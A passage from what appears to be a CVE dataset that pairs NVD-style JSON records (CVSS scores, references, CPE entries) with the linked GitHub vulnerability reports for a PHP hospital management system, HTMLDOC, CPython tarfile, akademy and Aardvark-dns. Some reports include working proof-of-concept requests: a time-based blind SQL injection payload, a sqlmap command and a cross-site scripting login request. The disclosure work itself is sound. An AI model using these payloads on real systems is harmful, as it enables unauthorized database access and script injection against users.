"Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/qingluan-bot/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276272" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276272" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.400787" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD44159-7FA3-4BA5-AD83-C1D439EEF374", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/qingluan-bot/cve/issues/1
[ "Exploit" ]
github.com
[ "qingluan-bot", "cve" ]
# code-projects Hospital Management System Using PHP With Source Code v1.0 /hms/doctor/index.php SQL injection # usernameOF AFFECTED PRODUCT(S) + Hospital Management System Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/hospital-management-system-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + qingxiaoluan ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/e13ce994-d280-4a64-90fb-f08663479bb4 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'index.php' file of the 'Hospital Management System Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="916" alt="1" src="https://github.com/user-attachments/assets/d432eacb-fb8c-4b6c-a893-f4e4a8515774"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "username" parameter, a serious SQL injection vulnerability has been discovered in the "Hospital Management System Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /hms/doctor/ HTTP/1.1 Host: 192.168.203.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://192.168.203.199:1218 Connection: close Referer: http://192.168.203.199:1218/hms/doctor/ Priority: u=0, i username=admin&password=admin123&submit=&submit= ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'username' parameter ## Payload: ``` Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 5927 FROM (SELECT(SLEEP(5)))Wsfu)-- DHws&password=admin123&submit=&submit= ``` <img width="351" alt="2" src="https://github.com/user-attachments/assets/44b4e0c9-7557-4abd-94af-3071370c69f6"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="406" alt="3" src="https://github.com/user-attachments/assets/9174afb4-9bda-43bb-833d-8fd712cf1130"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Hospital Management System Using PHP With Source Code v1.0 /hms/doctor/index.php SQL injection
https://api.github.com/repos/qingluan-bot/cve/issues/1/comments
0
2024-08-31T12:07:46Z
2024-08-31T12:07:46Z
https://github.com/qingluan-bot/cve/issues/1
2,498,814,105
1
6,256
CVE-2024-45508
2024-09-01T22:15:13.987
HTMLDOC before 1.9.19 has an out-of-bounds write in parse_paragraph in ps-pdf.cxx because of an attempt to strip leading whitespace from a whitespace-only node.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/michaelrsweet/htmldoc/blob/2d5b2ab9ddbf2aee2209010cebc11efdd1cab6e2/CHANGES.md" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/michaelrsweet/htmldoc/commit/2d5b2ab9ddbf2aee2209010cebc11efdd1cab6e2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/528" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*", "matchCriteriaId": "41C36E7A-1413-44D0-B604-E7BD5C6CD652", "versionEndExcluding": "1.9.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/michaelrsweet/htmldoc/issues/528
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "michaelrsweet", "htmldoc" ]
Hello, I found an out of bounds memory write in parse_paragraph function,ps-pdf.cxx Reporter: WhereisDoujo from Ocean University of China test platform: htmldoc Version :current OS :Kali 6.6.9-1kali1 (2024-01-08) kernel: 6.6.9-amd64 reproduced: (htmldoc with asan build option) ./htmldoc -f 1.pdf ./poc.html [poc.zip](https://github.com/user-attachments/files/16783485/poc.zip) ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4357==ERROR: AddressSanitizer: SEGV on unknown address 0x55852f54cb40 (pc 0x55852f4bc7a6 bp 0x7ffca6baca10 sp 0x7ffca6bac7c0 T0) ==4357==The signal is caused by a WRITE memory access. #0 0x55852f4bc7a6 (/usr/local/bin/htmldoc+0x19d7a6) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #1 0x55852f488212 (/usr/local/bin/htmldoc+0x169212) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #2 0x55852f489376 (/usr/local/bin/htmldoc+0x16a376) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #3 0x55852f489376 (/usr/local/bin/htmldoc+0x16a376) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #4 0x55852f489376 (/usr/local/bin/htmldoc+0x16a376) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #5 0x55852f4863fe (/usr/local/bin/htmldoc+0x1673fe) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #6 0x55852f4863fe (/usr/local/bin/htmldoc+0x1673fe) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #7 0x55852f4863fe (/usr/local/bin/htmldoc+0x1673fe) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #8 0x55852f47a958 (/usr/local/bin/htmldoc+0x15b958) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #9 0x55852f453b19 (/usr/local/bin/htmldoc+0x134b19) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) #10 0x7f6b9382bd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 490fef8403240c91833978d494d39e537409b92e) #11 0x7f6b9382be3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 490fef8403240c91833978d494d39e537409b92e) #12 0x55852f369944 (/usr/local/bin/htmldoc+0x4a944) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/htmldoc+0x19d7a6) (BuildId: 9b38309ddd5aa38458dae5422caef06a503695df) ==4357==ABORTING ``` this bug in htmldoc/htmldoc/ps-pdf.cxx:5208 ``` for (dataptr = temp->data; *dataptr; dataptr ++) *dataptr = dataptr[1]; *dataptr = '\0'; ```
AddressSanitizer: out of bounds memory write in parse_paragraph functionin,htmldoc/htmldoc/ps-pdf.cxx:5208
https://api.github.com/repos/michaelrsweet/htmldoc/issues/528/comments
1
2024-08-28T14:45:26Z
2024-08-28T18:23:16Z
https://github.com/michaelrsweet/htmldoc/issues/528
2,492,313,862
528
6,257
CVE-2024-6232
2024-09-03T13:15:05.363
There is a MEDIUM severity vulnerability affecting CPython. Regular expressions that allowed excessive backtracking during tarfile.TarFile header parsing are vulnerable to ReDoS via specifically-crafted tar archives.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/34ddb64d088dd7ccc321f6103d23153256caa5d4" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/4eaf4891c12589e3c7bdad5f5b076e4c8392dd06" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/743acbe872485dc18df4d8ab2dc7895187f062c4" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/7d1f50cd92ff7e10a1c15a8f591dde8a6843a64d" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/b4225ca91547aa97ed3aca391614afbb255bc877" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/d449caf8a179e3b954268b3a88eb9170be3c8fbf" }, { "source": "cna@python.org", "tags": [ "Patch" ], "url": "https://github.com/python/cpython/commit/ed3a49ea734ada357ff4442996fd4ae71d253373" }, { "source": "cna@python.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/python/cpython/issues/121285" }, { "source": "cna@python.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/python/cpython/pull/121286" }, { "source": "cna@python.org", "tags": [ "Vendor Advisory" ], "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/JRYFTPRHZRTLMZLWQEUHZSJXNHM4ACTY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2024/09/03/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20241018-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "B475FA53-D1F3-44C8-80CD-0CEA88129109", "versionEndExcluding": "3.8.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "9365E878-106E-49B6-98FC-9FA339CD5216", "versionEndExcluding": "3.9.20", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFD756EB-DF07-4485-A2AA-59FBD7260A21", "versionEndExcluding": "3.10.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EE0E5D8-452F-4862-9C23-23AC1DDEFB1E", "versionEndExcluding": "3.11.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "matchCriteriaId": "5D4E662B-59E4-495E-941E-2246D2168B42", "versionEndExcluding": "3.12.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "3BA51E41-D221-431F-870F-536AF2867B50", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "978582FF-B8F3-479F-AE77-359E9AEE6F23", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "84E3F62C-7218-4DC3-8473-8A576739643A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "1FD15706-B8BC-4801-9F93-06771F2E12C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "0FDC359F-E8ED-4777-83FB-1EC63F095CBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "6893BDDE-4D90-4592-8701-C6B3FFEB0CFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:alpha6:*:*:*:*:*:*", "matchCriteriaId": "E316F712-F03A-4378-8192-D1640819698B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "8566F034-27CB-422E-950B-DCAA926CF64F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "EACCE6C3-7701-4966-9D88-E949C82FCA46", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "A4853BF2-9C27-465F-9840-5B37013C9F74", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "B266541A-E877-4CAD-A1EF-08A069441F36", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:python:python:3.13.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8384A34C-50CD-439C-A2BB-DEA6161342C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/python/cpython/issues/121285
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "python", "cpython" ]
### Bug description: Today the `tarfile` module parsing of header values allows for backtracking when parsing header values. Headers have a well-known format that doesn't require backtracking to parse reliably, the new method of parsing will only require a single pass over a byte stream. ### CPython versions tested on: CPython main branch ### Operating systems tested on: _No response_ <!-- gh-linked-prs --> ### Linked PRs * gh-121286 * gh-123542 * gh-123543 * gh-123639 * gh-123640 * gh-123641 * gh-123642 <!-- /gh-linked-prs -->
Remove backtracking from parsing tarfile members and headers
https://api.github.com/repos/python/cpython/issues/121285/comments
5
2024-07-02T18:31:41Z
2024-09-18T22:22:37Z
https://github.com/python/cpython/issues/121285
2,386,893,180
121,285
6,258
CVE-2024-8407
2024-09-04T14:15:15.113
A vulnerability was found in alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file cmd/akademy/handler/handlers.go. The manipulation of the argument emailAddress leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/alwindoss/akademy/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.276487" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.276487" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.397340" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alwindoss:akademy:*:*:*:*:*:*:*:*", "matchCriteriaId": "917BD204-5A35-4973-8C7D-0751F5CE5C59", "versionEndExcluding": null, "versionEndIncluding": "2024-08-24", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alwindoss/akademy/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "alwindoss", "akademy" ]
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go Flaw reason: in the CMD file/akademy/handler/handlers. Go line 40, output code directly provided by the user email address (obtained from the form values), without any form of filtering or escaped. This can result in Reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed on the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more. Vulnerability POC: Suppose a malicious user enters an email address with a <script> tag, such as <script>alert('XSS'); </script>. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability. cmd/akademy/handler/handlers.go: ```Go // HandleLogin implements PageHandler. func (h pageHandler) HandleLogin(w http.ResponseWriter, r *http.Request) { fmt.Println("Handle Login") r.ParseForm() email := r.FormValue("emailAddress") fmt.Println("Email", email) w.Write([]byte(email)) } ``` POC: ``` POST /login HTTP/1.1 Host: 192.168.1.7:8080 Content-Length: 148 Cache-Control: max-age=0 Origin: http://192.168.1.7:8080 DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.7:8080/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5 Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas= Connection: keep-alive csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script> ``` ![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go
https://api.github.com/repos/alwindoss/akademy/issues/1/comments
0
2024-08-24T08:41:55Z
2024-08-24T08:41:55Z
https://github.com/alwindoss/akademy/issues/1
2,484,369,124
1
6,259
CVE-2024-8418
2024-09-04T15:15:15.773
A flaw was found in Aardvark-dns, which is vulnerable to a Denial of Service attack due to the serial processing of TCP DNS queries. An attacker can exploit this flaw by keeping a TCP connection open indefinitely, causing the server to become unresponsive and resulting in other DNS queries timing out. This issue prevents legitimate users from accessing DNS services, thereby disrupting normal operations and causing service downtime.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
